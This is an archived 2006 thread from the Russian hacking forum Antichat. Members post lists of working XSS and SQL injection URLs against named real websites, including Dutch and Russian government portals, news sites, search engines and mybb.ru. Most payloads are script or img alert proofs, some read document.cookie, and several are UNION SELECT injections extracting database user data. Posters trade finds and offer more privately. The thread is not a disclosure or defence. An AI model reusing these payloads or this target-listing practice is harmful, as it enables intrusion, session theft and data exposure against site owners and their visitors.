Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Ещё немного Xss и прочего. (https://forum.antichat.xyz/showthread.php?t=12704)

Azazel 09.01.2006 18:01
Ещё немного Xss и прочего.
 
Завалялось вот у меня немного барахлишка. Выкладываю чтобы не пропало. =))
Код HTML:
http://vacaturekrant.nl/werkgever/bestel.fpl?action=<img%20src=javascript:alert("test")>
http://www.beatrix.org/html/index.php?pLan=en&pSes=37f2657266d4d5633dc9859a9332cea3&pMn=ifo&pPg=%3Cscript%3Ealert('ok')%3C/script%3E
http://www.hotelbeatrix.nl/index.php?menu_id=1&t_id=-1+union+select+null,USER(),null,null,null,null,null,null,null,null,null/*
http://www.jongbeatrix.nl/jb_nieuws.php?nws_year=<img%20src=javascript:a=/ok/;alert(a.source)>
http://www.ervbeatrix.nl/page.php?PageID='><img%20src=javascript:alert('ok')>
http://www.hilfertsheem.nl/admin/index.php?f=догадайся
http://wwtdd.com/index.php?type=box&p='%3E%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.qoop.nl/index.php?page=%2Fzoeken.php%3Ftype%253Darticle%2526keyword%253D%253Cscript%253Ealert%2528%252FYour%2BBunny%2BWrote%252F%2529%253C%252Fscript%253E%2526SID%253D
http://www.comicbase.nl/nieuws.php?openmaand=200'412
http://www.foksuk.nl/dag2.php?jaar=2005&week=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.kiesmetzorg.nl/index.php?b=27&d=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.aup.nl/do.php?a=show_visitor_digitaal&b=downloads&p='%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.bvlo.be/article/view.web?articleId=5&siteNav=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.schildklier.nl/index.php?id=%3Cscript%3Ealert(/Your%20Bunny%20wrote/)%3C/script%3E
http://www.wegcode.be/wetgrp.php?g=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.volkskrant.com/verleiding/steden/stad.php?stad='>%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.vdo.com/DTCO/metanavigation/search_dtco.aspx?cc=NL&coc=NL&search=<img%20src=javascript:a=/ok/;alert(a.source)>
http://www.ecodorp.nl/welkom/index.php?inhoud=<script>alert(/ok/)</script>
http://www.artsenzondergrenzen.nl/index.php?pid=6'%3Cscript%3Ealert(/Hack%20me!/)%3C/script%3E&article=
http://www.burojansen.nl/nieuwsbrief_jaar.php?jaar=<script>alert(/antichat/)</script>
http://www.balkenende-stop.nl/?zone=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://en.thinkexist.com/search/searchquotation.asp?search=%3Cscript%3Ealert%28%2Fgo%21%2F%29%3C%2Fscript%3E
http://www.cafepress.com/cp/search/search.aspx?source=searchBox&q=%3Cscript%3Ealert%28%2Fcccp%2F%29%3C%2Fscript%3E&cfpt2=&copt=&cfpt=&x=0&y=0
http://www.highbeam.com/library/search.asp?ctrlInfo=Round18%3AMode18c%3ASR%3ASearch&FN=SS&search_newspapers=on&search_magazines=on&search_books=on&search_transcripts=on&search_maps=on&search_images=on&search_encyclopedias=on&search_dictionaries=on&search_almanacs=on&q=%3Cscript%3Ealert%28%2Fantichat.ru%2F%29%3C%2Fscript%3E&submit.x=30&submit.y=6&submit=submit

Azazel 09.01.2006 22:33
XSS На сайте правительства Нидерландов _http://www.regering.nl/sys/zoeken.jsp В поле поиск <body onLoad=alert('ok')>

_http://www.government.nl/print.jsp?start_comment=print-start&end_comment=print-end&url=%3Cscript%3Ealert(/cccp/)%3C/script%3E

k0ldun 14.01.2006 17:12
http://www.1tv.ru/owa/win/ort5_conf.conf нашел седня на сайте орт, в поле фио или вопрос "><script>alert(/xss/)</script><h1>test</h1>

Vandal 14.01.2006 17:28
http://www.oxiris.com/


П строке поиска . <script>alert ('xss')</script> не вы шло ,

но <table border=200><tr><td>dasd</td></tr> , прикольно получилось .

Vandal 14.01.2006 17:31
http://www.td-shkolnik.com/


аналогично , aлерт не вышел но другие теги пропускает .

max_pain89 14.01.2006 19:25
Если другие теги пропускает, то можно <img src=javascript:alert()>

Vandal 14.01.2006 19:36
Цитата:
Сообщение от max_pain89
Если другие теги пропускает, то можно <img src=javascript:alert()>

Все равно 0 .

D1mOn 14.01.2006 19:39
на http://www.td-shkolnik.com/ прекрасно проходит <script>alert()</script>, только в IE и Опере)))

Vandal 14.01.2006 19:41
Как то все странно , у меня в ие и опере не работает .


_______

alert () работает alert('xss') не работатет

max_pain89 14.01.2006 19:52
если ты про _http://www.oxiris.com/ там сойдет <img src=vbscript:alert()> исключительно для алерта...

k0ldun 14.01.2006 21:58
http://sm.aport.ru/scripts/template.dll?That=epte&r="><script>alert(/xss/)</script><h1>HMM на апорте

xdx 02.02.2006 22:56
http://www.interrus.ru/journal/bzn.php?interrus=business&page=comments?idea=%3Csc ript%3Ealert(/xss/)%3C/script%3E

LobNess 15.02.2006 03:29
http://search.spb.tele2.ru/portalsea...CF%EE%E8%F1%EA
вот еще на сайте оператора сотовой свзи

roruda_semu 15.02.2006 18:09
pacimu vsegda alert ... vi ni mojete delat drugoy xss ?

LobNess 16.02.2006 06:40
Если есть алерт, то знающему человеку не составит труда сделать из небольшой шутки грозное оружие...

max_pain89 16.02.2006 20:59
например confirm() или что-то типо

if (confirm("You are stupid??????")) {
alert("Странно, щас проверим!"); }
else {
alert("Не ври мне!");
}

vectorg 16.02.2006 22:34
завалявшееся:

http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>

http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(do cument.cookie)</script>

http://www.government.gov.ru/search/search.html?query="><script>alert('VectorG')</script>&page=1&book=0&he_id=38&pres_he_id=38

http://www.americasarmy.com/includes/bumper.php?goto="><script>alert()</script>

ещё есть новая xss на рамблер.ру, кому надо пишите в ПМ

CinerX 14.03.2006 18:35
Вот решил выложить пару XSS с mylivepage.ru.... Выкладываю без алерта и всегопрочего ... Может еще работают =)

/login?name=&password=&return_url=http://name_site.mylivepage.ru/forum/36/11/%D0%9A%D1%82%D0%BE%20%D0%B1%D1%8B%D0%BB%20%D1%83%2 0%D0%BC%D0%B5%D0%BD%D1%8F%20%D0%BD%D0%B0%20%D1%81% D0%B0%D0%B9%D1%82%D0%B5%3F%3F%3F&login=[код]

/link?message_logintype=anonymous&message_logintype =login&message_login=&message_password=&link_url_s ubject=http://&add_link_url_action=[код]

/login?name=&password=&return_url=http://site_name.mylivepage.ru/link/39/71&login=[код]

/counter?type=[код]

/wiki/22/15?message_logintype=anonymous&message_logintype=l ogin&message_login=&message_password=&message_subj ect=&message_subscribe=&message_add_action=Отп авить+комментарий&message_rows=[код]

/friend?page=[код]&act=idx&type=image


ну и может кому понадобится для хохмы... Так как она никакой ценности не имеет

http://mybb.ru/cat.php?cat=[код]

max_pain89 14.03.2006 19:01
Цитата:
Сообщение от CinerX

ну и может кому понадобится для хохмы... Так как она никакой ценности не имеет

http://mybb.ru/cat.php?cat=[код]
Хрена себе не имеет

_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*

Nova 14.03.2006 19:07
Цитата:
Сообщение от max_pain89
Хрена себе не имеет
_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
Прикольнодо чего разработчики докатились что у них= наоф сайте уже баги есть......

CinerX 14.03.2006 20:30
Цитата:
Сообщение от max_pain89
Хрена себе не имеет

_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
Хех... Знаем... =) Молодец, что проверил! Держи + за это =)


Время: 09:33